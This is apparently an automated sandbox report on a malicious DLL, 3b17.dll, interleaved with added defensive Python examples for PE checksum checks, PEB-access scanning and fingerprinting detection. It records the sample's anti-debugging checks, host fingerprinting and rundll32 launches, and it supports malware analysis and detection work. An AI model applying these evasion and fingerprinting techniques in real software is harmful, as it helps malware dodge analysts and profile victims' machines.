Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3b17.dll' |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time |
|
Source: unknown |
Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2 |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2 |
|
Source: C:\Windows\System32\loaddll32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Automated click: OK |
Source: C:\Windows\SysWOW64\rundll32.exe |
Automated click: OK |
Source: C:\Windows\SysWOW64\rundll32.exe |
Automated click: OK |
Source: C:\Windows\SysWOW64\rundll32.exe |
Automated click: OK |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: 3b17.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress, |
0_2_6E191F7C |
Source: 3b17.dll |
Static PE information: real checksum: 0xa34b8 should be: 0x9effb |
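The checksum line reports that the CheckSum field stored in 3b17.dll's optional header (0xa34b8) does not match the value recomputed over the file (0x9effb). Many user-mode builds ship with CheckSum set to 0, so a mismatch alone proves nothing, but a non-zero value that is wrong usually means the file was modified after the linker wrote it (patched, repacked or had a payload appended), which fits a loader DLL. The script below is an added example, not part of the report and not code from the sample: it implements the algorithm Windows' CheckSumMappedFile uses (sum the image as 32-bit words with end-around carry, skip the CheckSum field itself, fold to 16 bits, add the file length) and exercises it on a constructed minimal image, since the DLL itself is not available here.

```python
"""PE CheckSum verification, as the sandbox performed on 3b17.dll (added example)."""
import struct

REPORT_STORED = 0xA34B8    # CheckSum field in 3b17.dll, per the report
REPORT_COMPUTED = 0x9EFFB  # value the sandbox recomputed, per the report


def checksum_field_offset(data):
    """File offset of OptionalHeader.CheckSum: 0x40 into the optional header
    for both PE32 and PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    optional_header = e_lfanew + 4 + 20      # Signature + IMAGE_FILE_HEADER
    return optional_header + 0x40


def compute_pe_checksum(data):
    skip_index = checksum_field_offset(data) // 4    # the field is 4-byte aligned
    padded = bytes(data) + b"\0" * (-len(data) % 4)  # pad the tail, but add the real length below
    total = 0
    for i in range(0, len(padded), 4):
        if i // 4 == skip_index:
            continue                                 # the CheckSum dword counts as zero
        total += struct.unpack_from("<I", padded, i)[0]
        if total > 0xFFFFFFFF:                       # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)         # fold to 16 bits
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def verify_pe_checksum(data):
    """Return (stored, computed, matches) for an in-memory PE image."""
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = compute_pe_checksum(data)
    return stored, computed, stored == computed


def patch_pe_checksum(data):
    """Return a copy of the image with a correct CheckSum written in."""
    img = bytearray(data)
    struct.pack_into("<I", img, checksum_field_offset(img), compute_pe_checksum(img))
    return bytes(img)


def minimal_pe(size=0x200):
    """Constructed stand-in image: 'MZ', e_lfanew = 0x40, 'PE\\0\\0', zeroed headers.
    Not a loadable file; just enough structure for the checksum walk."""
    img = bytearray(size)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)
    img[0x40:0x44] = b"PE\0\0"
    return bytes(img)


if __name__ == "__main__":
    stored, computed, ok = verify_pe_checksum(minimal_pe())
    print(f"constructed image: stored=0x{stored:x} computed=0x{computed:x} match={ok}")
    print(f"3b17.dll (report): stored=0x{REPORT_STORED:x} computed=0x{REPORT_COMPUTED:x} "
          f"match={REPORT_STORED == REPORT_COMPUTED}")
```

To check a real file, read it with `open(path, "rb").read()` and pass the bytes to verify_pe_checksum; treat stored == 0 as "not set" rather than as a mismatch, and reserve the mismatch signal for non-zero stored values such as the one this report shows.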
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E192200 push ecx; ret |
0_2_6E192209 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E192253 push ecx; ret |
0_2_6E192263 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E217583 push ecx; ret |
0_2_6E217596 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E87A60 push ecx; ret |
3_2_00E87A69 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E87DCF push ecx; ret |
3_2_00E87DDF |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E217583 push ecx; ret |
3_2_6E217596 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Registry key monitored for changes: HKEY_CURRENT_USER_Classes |
Source: C:\Windows\System32\loaddll32.exe |
Process information set: NOOPENFILEERRORBOX (2 occurrences) |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX (17 occurrences) |
Source: C:\Windows\SysWOW64\rundll32.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_6E1DE78D |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress, |
0_2_6E191F7C |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E20227F mov eax, dword ptr fs:[00000030h] |
0_2_6E20227F |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F2120 mov eax, dword ptr fs:[00000030h] |
0_2_6E1F2120 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E21E801 mov eax, dword ptr fs:[00000030h] |
0_2_6E21E801 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E21E730 mov eax, dword ptr fs:[00000030h] |
0_2_6E21E730 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E21E337 push dword ptr fs:[00000030h] |
0_2_6E21E337 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E20227F mov eax, dword ptr fs:[00000030h] |
3_2_6E20227F |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F2120 mov eax, dword ptr fs:[00000030h] |
3_2_6E1F2120 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E21E801 mov eax, dword ptr fs:[00000030h] |
3_2_6E21E801 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E21E730 mov eax, dword ptr fs:[00000030h] |
3_2_6E21E730 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E21E337 push dword ptr fs:[00000030h] |
3_2_6E21E337 |
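The `mov eax, dword ptr fs:[00000030h]` and `push dword ptr fs:[00000030h]` rows above are the sandbox flagging reads of the PEB through the TEB self-pointer: on 32-bit Windows fs:[0x30] holds the PEB address, and anti-debugging code then inspects PEB.BeingDebugged (offset 0x02) or PEB.NtGlobalFlag (offset 0x68, where the heap flags 0x70 are set when the process was created under a debugger). The instruction alone is weak evidence, because the MSVC CRT and any loader that resolves APIs by walking PEB->Ldr read fs:[0x30] too, so the practitioner's check is what the code does with the pointer afterwards. The scanner below is an added example, not code from the report or from the sample; it finds the three x86 encodings of a fs:[0x30] read in a raw code buffer, and the stub bytes it scans are constructed here to mimic a BeingDebugged/NtGlobalFlag check.

```python
"""Static scan for 32-bit x86 reads of the PEB via fs:[0x30].

Added example for the sandbox rows flagging 'mov eax, dword ptr fs:[30h]';
it is not the sample's code. The SAMPLE_STUB bytes are constructed here.
"""
import struct

# 32-bit PEB fields that anti-debugging code reads after fetching fs:[0x30].
PEB_BEING_DEBUGGED = 0x02   # BYTE, non-zero when a debugger is attached
PEB_NT_GLOBAL_FLAG = 0x68   # DWORD; heap flags 0x70 set by debugger-created processes

FS_PREFIX = 0x64                       # segment-override prefix for FS
PEB_DISP = struct.pack("<I", 0x30)     # disp32 = 0x30, little-endian
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def scan_peb_access(code: bytes):
    """Return [(offset, mnemonic)] for each fs:[0x30] read found in `code`.

    Encodings handled:
      64 A1 30 00 00 00       mov eax, fs:[30h]      (short moffs32 form, EAX only)
      64 8B /r 30 00 00 00    mov r32, fs:[30h]      (ModRM mod=00, r/m=101 -> disp32)
      64 FF 35 30 00 00 00    push dword ptr fs:[30h]
    This is a linear byte scan, not a disassembler: a 0x64 byte that belongs to
    an immediate or a displacement can line up with one of these patterns, so
    hits should be confirmed against a real disassembly.
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != FS_PREFIX:
            i += 1
            continue
        op = code[i + 1] if i + 1 < n else None
        if op == 0xA1 and code[i + 2:i + 6] == PEB_DISP:
            hits.append((i, "mov eax, dword ptr fs:[30h]"))
            i += 6
        elif (op == 0x8B and i + 2 < n and (code[i + 2] & 0xC7) == 0x05
              and code[i + 3:i + 7] == PEB_DISP):
            reg = REG32[(code[i + 2] >> 3) & 7]
            hits.append((i, f"mov {reg}, dword ptr fs:[30h]"))
            i += 7
        elif op == 0xFF and code[i + 2:i + 3] == b"\x35" and code[i + 3:i + 7] == PEB_DISP:
            hits.append((i, "push dword ptr fs:[30h]"))
            i += 7
        else:
            i += 1
    return hits


# Constructed stub (not from the sample): BeingDebugged check, NtGlobalFlag
# check, then a push of the PEB pointer for a callee. Offsets in comments.
SAMPLE_STUB = (
    b"\x64\xA1\x30\x00\x00\x00"          # 00: mov  eax, fs:[30h]
    b"\x0F\xB6\x40\x02"                  # 06: movzx eax, byte ptr [eax+2]   ; BeingDebugged
    b"\x85\xC0"                          # 10: test eax, eax
    b"\x75\x10"                          # 12: jne  debugged
    b"\x64\x8B\x0D\x30\x00\x00\x00"      # 14: mov  ecx, fs:[30h]
    b"\x8B\x41\x68"                      # 21: mov  eax, [ecx+68h]           ; NtGlobalFlag
    b"\xA9\x70\x00\x00\x00"              # 24: test eax, 70h
    b"\x75\x05"                          # 29: jne  debugged
    b"\x64\xFF\x35\x30\x00\x00\x00"      # 31: push dword ptr fs:[30h]
    b"\xB8\x64\x00\x00\x00"              # 38: mov  eax, 64h  (0x64 inside an immediate: no hit)
    b"\xC3"                              # 43: ret
)


def sample_findings():
    """Scan the constructed stub; used by the stand-alone run below."""
    return scan_peb_access(SAMPLE_STUB)


if __name__ == "__main__":
    for off, text in sample_findings():
        print(f"{off:04x}  {text}")
```

The same check on a 64-bit image looks for `gs:[0x60]` instead (prefix 0x65, displacement 0x60); both processes in this report are 32-bit, which is why every row shows fs:[0x30].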
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_6E1DE78D |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_6E1DDFF3 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_6E1F18EF |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_6E1DE78D |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
3_2_6E1DDFF3 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_6E1F18EF |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 |
Jump to behavior |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
Binary or memory string: Program Manager |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
Binary or memory string: Progman |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
Binary or memory string: Progmanlock |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1DEBB6 cpuid |
0_2_6E1DEBB6 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191E8A GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, |
0_2_6E191E8A |
Source: C:\Windows\System32\loaddll32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, |
0_2_6E191144 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E84454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, |
3_2_00E84454 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E201C7E _free,GetTimeZoneInformation,_free, |
0_2_6E201C7E |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, |
0_2_6E191F10 |
Source: C:\Windows\System32\loaddll32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |
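Taken together, the rows above (UI-language query, InstallDate, MachineGuid, GetUserNameW/GetComputerNameW, time zone) are host fingerprinting: the values are stable per machine and are what a bot typically hashes into its identifier and uses to decide whether the host is worth infecting. Any one of them is also read by plenty of legitimate software, so a useful rule correlates several indicator classes per process rather than alerting on a single registry read. The script below is an added example, not part of the report: it parses the report's own two-line row layout (a `Source:` line followed by the observation line, with an optional `Jump to behavior` or address trailer) and flags a process once it shows at least two distinct indicator classes. The input rows are copied from this section; the indicator table and threshold are assumptions to tune for your own environment.

```python
"""Correlate host-fingerprinting indicators across sandbox report rows.

Added example, not part of the report. REPORT_ROWS is copied from the rows
above; FINGERPRINT_INDICATORS and the threshold are assumptions.
"""

REPORT_ROWS = r"""
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191E8A GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, |
0_2_6E191E8A |
Source: C:\Windows\System32\loaddll32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E84454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, |
3_2_00E84454 |
Source: C:\Windows\System32\loaddll32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |
"""

# (indicator class, row kind, any-of substrings expected in the row detail)
FINGERPRINT_INDICATORS = [
    ("machine_guid", "Key value queried", ("MachineGuid",)),
    ("install_date", "Key value queried", ("InstallDate",)),
    ("host_names",   "Code function",     ("GetComputerNameW", "GetUserNameW")),
    ("locale",       "Code function",     ("GetLocaleInfoA", "GetSystemDefaultUILanguage")),
]


def parse_rows(text):
    """Return [(source, kind, detail)] from the report's flattened row layout.

    A row is 'Source: <process> |' followed by '<kind>: <detail> |'. The
    optional trailer ('Jump to behavior |' or a bare function address) has no
    ':' and is skipped; the source is cleared after use so a trailer can never
    be mis-attached to the previous process.
    """
    records, source = [], None
    for raw in text.splitlines():
        line = raw.strip().rstrip("|").strip()
        if not line:
            continue
        if line.startswith("Source:"):
            source = line[len("Source:"):].strip()
        elif ":" in line and source is not None:
            kind, _, detail = line.partition(":")
            records.append((source, kind.strip(), detail.strip()))
            source = None
    return records


def fingerprint_indicators(records):
    """Map each source process to the set of indicator classes it triggered."""
    seen = {}
    for source, kind, detail in records:
        for name, want_kind, needles in FINGERPRINT_INDICATORS:
            if kind == want_kind and any(n in detail for n in needles):
                seen.setdefault(source, set()).add(name)
    return seen


def flag_fingerprinting(records, threshold=2):
    """Processes with at least `threshold` distinct indicator classes.

    A single MachineGuid or InstallDate read is routine for installers and
    telemetry; two or more classes in one process is the signal worth review.
    """
    return {src: sorted(names)
            for src, names in fingerprint_indicators(records).items()
            if len(names) >= threshold}


if __name__ == "__main__":
    for proc, names in flag_fingerprinting(parse_rows(REPORT_ROWS)).items():
        print(f"{proc}: {', '.join(names)}")
```

On this report's rows only loaddll32.exe crosses the threshold (locale, InstallDate and MachineGuid); rundll32.exe shows one class (computer and user name) and is left alone. Note that the observations come from the sandbox's API trace; on a live host the registry reads are not visible to Sysmon, which logs value writes rather than queries, so the same rule would need an API-level source such as an EDR telemetry feed.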
Source: Yara match |
File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY |
Source: Yara match |
File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY |